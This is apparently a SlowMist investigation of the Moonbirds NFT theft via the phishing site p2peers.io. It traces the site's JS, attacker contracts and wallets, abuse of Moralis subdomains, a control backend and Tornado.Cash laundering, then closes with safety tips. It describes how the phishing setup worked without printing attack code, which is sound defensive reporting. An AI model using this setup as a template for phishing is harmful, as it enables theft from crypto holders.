Analysis of Stolen Moonbird NFTs
On May 25th, Twitter user @0xLosingMoney stated a user, @Dvincent_ stole 29 Moonbirds NFTs, worth approximately $700,000 through the use of a phishing website: p2peers.io. The website has now been shut down. The user stated that this domain, along with another, sarek.fi, was used in previous hacking incidents.
The SlowMist security team had to collect pertinent information in order to conduct a analysis of this incident.
When we began gathering and analyzing information regarding this incident, starting with the hacker’s Twitter handle, @Dvincent_, which is no longer available. We then discovered on May 10th, Twitter user @just1n_eth (a BAYC series NFT holder) stated that @Dvincent_ had reached out to him to trade BAYC NFTs. An agreement to trade was established, but the transaction was never finalized because @Dvincent_ insisted on using a platform unfamiliar to @just1n_eth to trade. That platform is p2peers.io., a phishing scam.
Within the Twitter comment section, another user, @jbe61 stated that he had also encountered the same individual (@Dvincent_) a few days prior. Here’s a screenshot of that conversation below:
On the evening of May 25, 2022, user @0xLosingMoney made a Twitter announcement regarding the hacker’s wallet and other information relevant to the hacker, @Dvincent_.
Here is the address @0xLosingMoney provided:
Analysis of Related Addresses
Since the entire hack pertains to the phishing website “p2peers.io”, we’ll start our investigation there. The phishing website’s domain name was registered under a Finnish company. Even though the website was suspended, we were still able to find some information on the website’s homepage through a Google snapshot.
Since it’s no longer possible to directly view the JS code, we went through the history of the snapshot under a cached view to find the main JS source code, which was done on April 30, 2022.
Sorting through the JS, we were able to find information on the phishing website and the transaction addresses involved within the code.
We located the approval address on line 912 in the code:
The address of the approved related function was also found on line 3407 in the code: 0xc9E39Ad832cea1677426e5fA8966416337F88749
We started analyzing the transaction records of these two addresses:
Our first result on Etherscan found that address 0x7F7…b6A was a malicious contract.
The creator’s (attacker’s) address of this malicious contract is: 0xd975f8c82932f55c7cef51eb4247f2bea9604aa3, where multiple records of NFT transactions were found.
We used NFTGO tothe holdings of this address, we were able to find that the stolen NFTs were still being stored and had yet to be sold. The value of the stolen NFTs equated to approximately $225,475.
We continued our investigation using MistTrack to analyze the transaction history of the attacker’s address:
We found that this address had only 12 ETH transactions, and the balance was only 0.0615
The second address, 0xc9E39Ad832cea1677426e5fA8966416337F88749, was also a contract address. The address that created it was 0x6035B92fd5102b6113fE90247763e0ac22bfEF63, which was also mentioned in the list of hacker addresses published by @0xLosingMoney.
Using MistTrack, we found that this address had a transaction history that involved 21 deposits and 97 withdrawals, with a total of 106.2 ETH transferred out.
Looking through the deposit and withdrawal history, we found multiple transfers to Tornado.Cash, indicating the hacker was trying to hide their stolen funds.
Hackers Utilize Moralis Functions for Malicious Purposes
On line 409 of the JS code, we found the function that interfaced with the domain name was usemoralis.com.
Port 2053 was for the API address and Port 2083 was for the backend login address.
Through our search, we found a large number of NFT related websites under the domain name“usemoralis.com”, many of which are phishing sites.
A simple Google search displayed multiple NFT sites with the same subdomain.
So, we went through and queried all of usemoralis.com’s subdomains and found that there were more than 3,000 subdomain sites related to usemoralis.com currently running on cloudflare.
We found that all of these sites are run by services provided by Moralis:
Moralis is a service that’s dedicated to developing and building Web3 DApps.
When you register, you’re presented with a management interface and an address. This makes it easy and cheap to make phishing websites.
Exploring the Background of the Scam and Connecting it to Phishing Events
Continuing our analysis of the JS code, on line 368, we found an interface for submitting the victim’s address to a website with a domain name: pidhnone.se.
After reviewing the data, the interfaces using the domain name pidhnone.se are:
After more research, it was found that https://pidhnone.se/login is a fraudulent control background that hackers use to manage information, like fraudulent assets.
By splicing the address according to how the background address works, you can see both the attacker’s address and the address of the person being attacked.
In the background, there is visual information and instructions on how to use the interface, which demonstrates how obvious it is that the website’s operations are fraudulent.
We examined the information in the backdrop, such as the images:
This includes information about phishing sites that hackers have used in the past, such as nftshifter.io
Let’s use the phishing website nftshifter.io as an example:
If you look at the relevant records on Twitter, you can see that on March 25, 2022, a victim visited the phishing website and posted about it.
We analyze nftshifter.io the same way:
Analyzing the JS code:
It’s been found that the moralis service and the fraud link https”//pidnone.se/ are also being used for control.
The malicious address listed below:
Contract creation time :
Mar-24–202 2 09:05:33 PM +UTC
At the same time, we discovered that this attacker shares 9 malicious contract codes:
Viewing the malicious contract address: 0xc9E…749, we can see the creator’s address is: 0x6035B92fd5102b6113fE90247763e0ac22bfEF63：
The same method has been used for laundering funds. Each malicious contract has the transaction record of each victim, which we will not show here.
Let’s take a look at another victim
A user was misled right after the attackers launched the malicious phishing scam.
The attacker ended up selling the NFTs, exchanging them for ETH. We used MistTrack to analyze the attacker’s address: 0x9d194cbca8d957c3fa4c7bb2b12ff83fca6398ee
We can see that 51 ETh has been transferred over to Tornado.Cash for the purpose of asset laundering. The attacker’s Twitter account, @nftshifter io, has been frozen and can’t be seen right now.
- Never click on any links or download any attachments from unknown sources.
- Most importantly, never disclose your private key and/or your recovery mnemonic.
- Always use a strong password and enable two-factor authentication (2FA). This extra layer of security will better protect your account.
- Whenever you’re uncertain about something, make sure you verify its legitimacy and confirm it using reliable sources.
- Do not send sensitive information over the Internet that attackers can use to send phishing emails to specific users.
- For more security tips, read this manual: Blockchain-dark-forest-selfguard-handbook